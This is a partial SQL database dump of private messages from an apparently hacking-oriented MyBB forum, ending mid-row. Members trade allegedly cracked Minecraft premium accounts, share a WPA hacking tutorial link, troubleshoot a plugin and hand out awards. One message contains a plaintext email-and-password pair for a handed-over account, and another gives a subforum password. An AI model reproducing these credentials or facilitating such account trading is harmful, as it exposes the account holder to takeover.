'[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nwould you like a mc premium account \r\nregards me\r\n[/quote]\r\n\r\nNitro_Hitman gave them to you on Ubers\r\n\r\nHe gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it\r\n[/quote]\r\n\r\nexcuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype.\r\nso before you get on your high heels calm down,pfft accusing me of leaking \r\n[/quote]\r\n\r\nO really? care to explain this? :\r\n\r\n[IMG]http://i.imgur.com/9PrGW.jpg[/IMG]\r\n\r\nWhy would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away\r\n\r\n\r\n[/quote]\r\n\r\nand i dont have thousands of freinds its called i\'v some freinds that give me heaps all the time.\r\n[/quote]\r\n\r\nAnd why do they give you heaps all the time? EXACTLY!!! your story is a lie\r\n[/quote]\r\n\r\nbecause they crack them for a living :O\r\n[/quote]\r\n\r\ni can\'t bother with this BS , do whatever you want but remember Karma bro', '1350809955', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3598', '258', '258', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '1', 'Re: hello', '0', '[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nwould you like a mc premium account \r\nregards me\r\n[/quote]\r\n\r\nNitro_Hitman gave them to you on Ubers\r\n\r\nHe gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it\r\n[/quote]\r\n\r\nexcuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype.\r\nso before you get on your high heels calm down,pfft accusing me of leaking \r\n[/quote]\r\n\r\nO really? care to explain this? :\r\n\r\n[IMG]http://i.imgur.com/9PrGW.jpg[/IMG]\r\n\r\nWhy would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away\r\n\r\n\r\n[/quote]\r\n\r\nand i dont have thousands of freinds its called i\'v some freinds that give me heaps all the time.\r\n[/quote]\r\n\r\nAnd why do they give you heaps all the time? EXACTLY!!! your story is a lie\r\n[/quote]\r\n\r\nbecause they crack them for a living :O\r\n[/quote]\r\n\r\ni can\'t bother with this BS , do whatever you want but remember Karma bro\r\n[/quote]\r\n\r\nI just dont like being accused of some thing thats not true thats all.', '1350810223', '0', '1', '0', '1', '0', '2', '1350811477'); INSERT INTO mybb_privatemessages VALUES('3599', '257', '258', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '2', 'Re: hello', '0', '[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nwould you like a mc premium account \r\nregards me\r\n[/quote]\r\n\r\nNitro_Hitman gave them to you on Ubers\r\n\r\nHe gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it\r\n[/quote]\r\n\r\nexcuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype.\r\nso before you get on your high heels calm down,pfft accusing me of leaking \r\n[/quote]\r\n\r\nO really? care to explain this? :\r\n\r\n[IMG]http://i.imgur.com/9PrGW.jpg[/IMG]\r\n\r\nWhy would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away\r\n\r\n\r\n[/quote]\r\n\r\nand i dont have thousands of freinds its called i\'v some freinds that give me heaps all the time.\r\n[/quote]\r\n\r\nAnd why do they give you heaps all the time? EXACTLY!!! your story is a lie\r\n[/quote]\r\n\r\nbecause they crack them for a living :O\r\n[/quote]\r\n\r\ni can\'t bother with this BS , do whatever you want but remember Karma bro\r\n[/quote]\r\n\r\nI just dont like being accused of some thing thats not true thats all.', '1350810223', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3600', '257', '257', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hey', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\nhey whats up.if you look on the who\'s online list its me and you and heaps of guest, why can\'t they just sign up\r\n[/quote]\r\nIdk. They are to lazy to sign up :D', '1350814425', '0', '1', '0', '1', '0', '2', '1350848517'); INSERT INTO mybb_privatemessages VALUES('3601', '53', '257', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hey', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\nhey whats up.if you look on the who\'s online list its me and you and heaps of guest, why can\'t they just sign up\r\n[/quote]\r\nIdk. They are to lazy to sign up :D', '1350814425', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3602', '257', '257', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'wpa hacking tut', '0', 'http://www.hackforums.net/showthread.php?tid=1701845&highlight=wpa\r\nhttp://www.hack*forums.net/showthread.php?tid=1701845&highlight=wpa\r\nif the first link doesnt work . use the secod link. you have to remove the \"*\".', '1350814655', '0', '3', '1350848498', '1', '0', '2', '1350848425'); INSERT INTO mybb_privatemessages VALUES('3603', '53', '257', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'wpa hacking tut', '0', 'http://www.hackforums.net/showthread.php?tid=1701845&highlight=wpa\r\nhttp://www.hack*forums.net/showthread.php?tid=1701845&highlight=wpa\r\nif the first link doesnt work . use the secod link. you have to remove the \"*\".', '1350814655', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3605', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Dude...', '0', 'One o my main jobs is awards... I cannot even do that now... Can you out me back.', '1350829098', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3615', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Plugin', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo wassup JOKE DOG, I was wondering how did you get the Username Changes plugin to work?\r\n[/quote]\r\n\r\nWhat error are you getting?\r\n[/quote]\r\nWhen I activate it it gives me a mybb sql error or something.\r\n[/quote]\r\n\r\nCopy and paste the error.', '1350847147', '0', '3', '1350847187', '1', '0', '0', '1350847156'); INSERT INTO mybb_privatemessages VALUES('3653', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'hello', '0', 'hey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks', '1350862084', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3614', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Plugin', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo wassup JOKE DOG, I was wondering how did you get the Username Changes plugin to work?\r\n[/quote]\r\n\r\nWhat error are you getting?\r\n[/quote]\r\nWhen I activate it it gives me a mybb sql error or something.', '1350847025', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3609', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Plugin', '0', 'Yo wassup JOKE DOG, I was wondering how did you get the Username Changes plugin to work?', '1350842986', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3610', '61', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '1', 'Group request', '0', 'What do you think about it? http://l33thacking.net/thread-1027.html\r\n\r\n', '1350843910', '0', '1', '0', '1', '0', '2', '1350844572'); INSERT INTO mybb_privatemessages VALUES('3611', '228', '61', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"61\";}}', '2', 'Group request', '0', 'What do you think about it? http://l33thacking.net/thread-1027.html\r\n\r\n', '1350843910', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3612', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Plugin', '0', '[quote=\'??????????¢™\']\r\nYo wassup JOKE DOG, I was wondering how did you get the Username Changes plugin to work?\r\n[/quote]\r\n\r\nWhat error are you getting?', '1350844980', '0', '3', '1350847025', '1', '0', '0', '1350846995'); INSERT INTO mybb_privatemessages VALUES('3651', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Logo', '0', '[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\ncheck ewhoring section, I can\'t seem to add images to the threads.\r\n[/quote]\r\n\r\nDid you read the forum rules? :?:\r\n[/quote]\r\n\r\nI did, so you can\'t have a thread design so it all looks better?\r\n[/quote]\r\n\r\nOpps, I forgot to add something. Anyway, I disabled img and video tags in that section so people don\'t post pornographic content.\r\n[/quote]\r\n\r\nokay you did good, going to bed now.\r\n[/quote]\r\n\r\ngood night.', '1350861854', '0', '1', '0', '1', '0', '0', '1350910136'); INSERT INTO mybb_privatemessages VALUES('3617', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Plugin', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo wassup JOKE DOG, I was wondering how did you get the Username Changes plugin to work?\r\n[/quote]\r\n\r\nWhat error are you getting?\r\n[/quote]\r\nWhen I activate it it gives me a mybb sql error or something.\r\n[/quote]\r\n\r\nCopy and paste the error.\r\n[/quote]\r\n\r\nMyBB SQL Error\r\n\r\nMyBB has experienced an internal SQL error and cannot continue.\r\n\r\nSQL Error:\r\n 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'TYPE=ENGINE\' at line 8\r\nQuery:\r\n CREATE TABLE mybb_username_history ( id int(5) NOT NULL auto_increment, uid int(6) NOT NULL, username varchar(120) NOT NULL, date bigint(30), PRIMARY KEY (id), INDEX (uid) ) TYPE=ENGINE;\r\n\r\nPlease contact the MyBB Group for support.\r\n', '1350847187', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3618', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Plugin', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo wassup JOKE DOG, I was wondering how did you get the Username Changes plugin to work?\r\n[/quote]\r\n\r\nWhat error are you getting?\r\n[/quote]\r\nWhen I activate it it gives me a mybb sql error or something.\r\n[/quote]\r\n\r\nCopy and paste the error.\r\n[/quote]\r\n\r\nMyBB SQL Error\r\n\r\nMyBB has experienced an internal SQL error and cannot continue.\r\n\r\nSQL Error:\r\n 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'TYPE=ENGINE\' at line 8\r\nQuery:\r\n CREATE TABLE mybb_username_history ( id int(5) NOT NULL auto_increment, uid int(6) NOT NULL, username varchar(120) NOT NULL, date bigint(30), PRIMARY KEY (id), INDEX (uid) ) TYPE=ENGINE;\r\n\r\nPlease contact the MyBB Group for support.\r\n\r\n[/quote]\r\n\r\nPlugin is outdated. Won\'t work. ', '1350847520', '0', '3', '1350847717', '1', '0', '0', '1350847685'); INSERT INTO mybb_privatemessages VALUES('3650', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Logo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\ncheck ewhoring section, I can\'t seem to add images to the threads.\r\n[/quote]\r\n\r\nDid you read the forum rules? :?:\r\n[/quote]\r\n\r\nI did, so you can\'t have a thread design so it all looks better?\r\n[/quote]\r\n\r\nOpps, I forgot to add something. Anyway, I disabled img and video tags in that section so people don\'t post pornographic content.\r\n[/quote]\r\n\r\nokay you did good, going to bed now.', '1350861757', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3620', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Plugin', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo wassup JOKE DOG, I was wondering how did you get the Username Changes plugin to work?\r\n[/quote]\r\n\r\nWhat error are you getting?\r\n[/quote]\r\nWhen I activate it it gives me a mybb sql error or something.\r\n[/quote]\r\n\r\nCopy and paste the error.\r\n[/quote]\r\n\r\nMyBB SQL Error\r\n\r\nMyBB has experienced an internal SQL error and cannot continue.\r\n\r\nSQL Error:\r\n 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'TYPE=ENGINE\' at line 8\r\nQuery:\r\n CREATE TABLE mybb_username_history ( id int(5) NOT NULL auto_increment, uid int(6) NOT NULL, username varchar(120) NOT NULL, date bigint(30), PRIMARY KEY (id), INDEX (uid) ) TYPE=ENGINE;\r\n\r\nPlease contact the MyBB Group for support.\r\n\r\n[/quote]\r\n\r\nPlugin is outdated. Won\'t work. \r\n[/quote]\r\nSo which plugin are you using? Also can you get on skype', '1350847717', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3621', '53', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'Re: wpa hacking tut', '0', '[quote=\'sirchamp\']\r\nhttp://www.hackforums.net/showthread.php?tid=1701845&highlight=wpa\r\nhttp://www.hack*forums.net/showthread.php?tid=1701845&highlight=wpa\r\nif the first link doesnt work . use the secod link. you have to remove the \"*\".\r\n[/quote]\r\n\r\nthanks man appreciated ;)\r\nthe link worked :O', '1350848498', '0', '1', '0', '1', '0', '2', '1350918787'); INSERT INTO mybb_privatemessages VALUES('3622', '257', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: wpa hacking tut', '0', '[quote=\'sirchamp\']\r\nhttp://www.hackforums.net/showthread.php?tid=1701845&highlight=wpa\r\nhttp://www.hack*forums.net/showthread.php?tid=1701845&highlight=wpa\r\nif the first link doesnt work . use the secod link. you have to remove the \"*\".\r\n[/quote]\r\n\r\nthanks man appreciated ;)\r\nthe link worked :O', '1350848498', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3623', '82', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'that premium account ', '0', 'Hey here is that premium account, enjoy \r\nusername: eliotbehr@gmail.com\r\npassword: pencil\r\nplease do not do a giveaway with it thanks:)', '1350851647', '0', '1', '0', '1', '0', '2', '1350852370'); INSERT INTO mybb_privatemessages VALUES('3624', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'that premium account ', '0', 'Hey here is that premium account, enjoy \r\nusername: eliotbehr@gmail.com\r\npassword: pencil\r\nplease do not do a giveaway with it thanks:)', '1350851647', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3625', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Logo', '0', 'Can you resize the logo icon and/or try another text font?', '1350853583', '0', '3', '1350858249', '1', '0', '0', '1350857844'); INSERT INTO mybb_privatemessages VALUES('3648', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Logo', '0', '[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\ncheck ewhoring section, I can\'t seem to add images to the threads.\r\n[/quote]\r\n\r\nDid you read the forum rules? :?:\r\n[/quote]\r\n\r\nI did, so you can\'t have a thread design so it all looks better?\r\n[/quote]\r\n\r\nOpps, I forgot to add something. Anyway, I disabled img and video tags in that section so people don\'t post pornographic content.', '1350861647', '0', '3', '1350861757', '1', '0', '0', '1350861719'); INSERT INTO mybb_privatemessages VALUES('3627', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Logo', '0', '[quote=\'t3h jok3r\']\r\nCan you resize the logo icon and/or try another text font?\r\n[/quote]\r\n\r\nhttp://i.imgur.com/RSCis.png\r\n\r\nsorry I don\'t have the time atm to change the font.', '1350858249', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3628', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Logo', '0', '[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\nCan you resize the logo icon and/or try another text font?\r\n[/quote]\r\n\r\nhttp://i.imgur.com/RSCis.png\r\n\r\nsorry I don\'t have the time atm to change the font.\r\n[/quote]\r\nNo problem about the font, the icon is my major concern and thanks a bunch.', '1350858376', '0', '3', '1350859155', '1', '0', '0', '1350859133'); INSERT INTO mybb_privatemessages VALUES('3647', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Logo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\ncheck ewhoring section, I can\'t seem to add images to the threads.\r\n[/quote]\r\n\r\nDid you read the forum rules? :?:\r\n[/quote]\r\n\r\nI did, so you can\'t have a thread design so it all looks better?', '1350861554', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3630', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Logo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\nCan you resize the logo icon and/or try another text font?\r\n[/quote]\r\n\r\nhttp://i.imgur.com/RSCis.png\r\n\r\nsorry I don\'t have the time atm to change the font.\r\n[/quote]\r\nNo problem about the font, the icon is my major concern and thanks a bunch.\r\n[/quote]\r\n\r\nno problem and fix my awards :P', '1350859155', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3631', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Logo', '0', '[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\nCan you resize the logo icon and/or try another text font?\r\n[/quote]\r\n\r\nhttp://i.imgur.com/RSCis.png\r\n\r\nsorry I don\'t have the time atm to change the font.\r\n[/quote]\r\nNo problem about the font, the icon is my major concern and thanks a bunch.\r\n[/quote]\r\n\r\nno problem and fix my awards :P\r\n[/quote]\r\n\r\nSure, which ones would you like?', '1350859201', '0', '3', '1350859311', '1', '0', '0', '1350859246'); INSERT INTO mybb_privatemessages VALUES('3644', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Logo', '0', 'check ewhoring section, I can\'t seem to add images to the threads.', '1350861112', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3645', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Logo', '0', '[quote=\'R?????zo?\']\r\ncheck ewhoring section, I can\'t seem to add images to the threads.\r\n[/quote]\r\n\r\nDid you read the forum rules? :?:', '1350861434', '0', '3', '1350861554', '1', '0', '0', '1350861514'); INSERT INTO mybb_privatemessages VALUES('3633', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Logo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\nCan you resize the logo icon and/or try another text font?\r\n[/quote]\r\n\r\nhttp://i.imgur.com/RSCis.png\r\n\r\nsorry I don\'t have the time atm to change the font.\r\n[/quote]\r\nNo problem about the font, the icon is my major concern and thanks a bunch.\r\n[/quote]\r\n\r\nno problem and fix my awards :P\r\n[/quote]\r\n\r\nSure, which ones would you like?\r\n[/quote]\r\n\r\nI don\'t know, I just saw you gave me the GFX one.\r\nThat\'s the only one I was looking for, you can do whatever you want. Oh and btw I need the password to the new rooms, is it with you or shall I pm the other guy? can\'t type the name atm.', '1350859311', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3634', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Logo', '0', '[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'R?????zo?\']\r\n[quote=\'t3h jok3r\']\r\nCan you resize the logo icon and/or try another text font?\r\n[/quote]\r\n\r\nhttp://i.imgur.com/RSCis.png\r\n\r\nsorry I don\'t have the time atm to change the font.\r\n[/quote]\r\nNo problem about the font, the icon is my major concern and thanks a bunch.\r\n[/quote]\r\n\r\nno problem and fix my awards :P\r\n[/quote]\r\n\r\nSure, which ones would you like?\r\n[/quote]\r\n\r\nI don\'t know, I just saw you gave me the GFX one.\r\nThat\'s the only one I was looking for, you can do whatever you want. Oh and btw I need the password to the new rooms, is it with you or shall I pm the other guy? can\'t type the name atm.\r\n[/quote]\r\n\r\nYou can PM anyone. I have removed the pass from the PIDs section, the only password protected forum we now have is movie rips. The password to movie rips is \"darip\"', '1350859464', '0', '3', '1350859616', '1', '0', '0', '1350859576'); INSERT INTO mybb_privatemessages VALUES('3636', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Logo', '0', 'Okay thanks, I\'m going to bed after I post few threads :)', '1350859616', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3637', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Logo', '0', '[quote=\'R?????zo?\']\r\nOkay thanks, I\'m going to bed after I post few threads :)\r\n[/quote]\r\n\r\nNo problem. Thanks and good night.', '1350859675', '0', '3', '1350861112', '1', '0', '0', '1350859733'); INSERT INTO mybb_privatemessages VALUES('3638', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]R?????zo?[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Gamer\r\nDescription: You are too addicted to gaming.\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350859742', '0', '1', '0', '1', '0', '0', '1350860450'); INSERT INTO mybb_privatemessages VALUES('3639', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]R?????zo?[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Gold Brick\r\nDescription: Earn this by upload amazing files to LH.\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350859753', '0', '1', '0', '1', '0', '0', '1350860439'); INSERT INTO mybb_privatemessages VALUES('3640', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]R?????zo?[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Diamond\r\nDescription: It\'s an award for those who are HQ members and have contributed a lot to the community also helped a lot of members. Members with this award are and will always be respected by the admins of LH. \r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350859764', '0', '1', '0', '1', '0', '0', '1350860430'); INSERT INTO mybb_privatemessages VALUES('3641', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]R?????zo?[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Angel\r\nDescription: Has done well helping others. \r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350859784', '0', '1', '0', '1', '0', '0', '1350860412'); INSERT INTO mybb_privatemessages VALUES('3642', '2', '2', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '1', 'A', '0', 'http://l33thacking.net/misc.php?action=help&hid=12', '1350860150', '0', '3', '1350874444', '1', '0', '0', '1350874312'); INSERT INTO mybb_privatemessages VALUES('3672', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hello', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nhey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks\r\n[/quote]\r\nSorry but they don\'t have special awards.\r\n[/quote]\r\n\r\nok are we allowed to ask for awards because i think i deserve the gaming award :)\r\n[/quote]\r\n\r\nNot really but since it\'s the starting yes.\r\n \r\n[/quote\r\n\r\nThanks joker appreciated :) ', '1350862927', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3673', '257', '257', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nhey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks\r\n[/quote]\r\nSorry but they don\'t have special awards.\r\n[/quote]\r\n\r\nok are we allowed to ask for awards because i think i deserve the gaming award :)\r\n[/quote]\r\n\r\nNot really but since it\'s the starting yes.\r\n \r\n[/quote]\r\n\r\nThanks joker appreciated :) \r\n[/quote]\r\n\r\nOh hell no, I didn\'t do it for free. I want REP :evil:', '1350862988', '0', '3', '1350865285', '1', '0', '0', '1350865237'); INSERT INTO mybb_privatemessages VALUES('3675', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hello', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nhey joker whats up, i just wanted to say, do you know our groups like unique,ddosing,gaming,act, do you believe we should get a award for what group your in for example if your in the unique group you should get a unique award. thanks\r\n[/quote]\r\nSorry but they don\'t have special awards.\r\n[/quote]\r\n\r\nok are we allowed to ask for awards because i think i deserve the gaming award :)\r\n[/quote]\r\n\r\nNot really but since it\'s the starting yes.\r\n \r\n[/quote]\r\n\r\nThanks joker appreciated :) \r\n[/quote]\r\n\r\nOh hell no, I didn\'t do it for free. I want REP :evil:\r\n[/quote]\r\n\r\nok joker i +reped ypu 3+ but does count for rep asking JW', '1350865285', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3676', '228', '228', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'hello', '0', 'hey i +reped you because i have been deciding who is the nicest member here and its you ', '1350865816', '0', '3', '1350866302', '1', '0', '2', '1350866261'); INSERT INTO mybb_privatemessages VALUES('3677', '257', '228', '257', 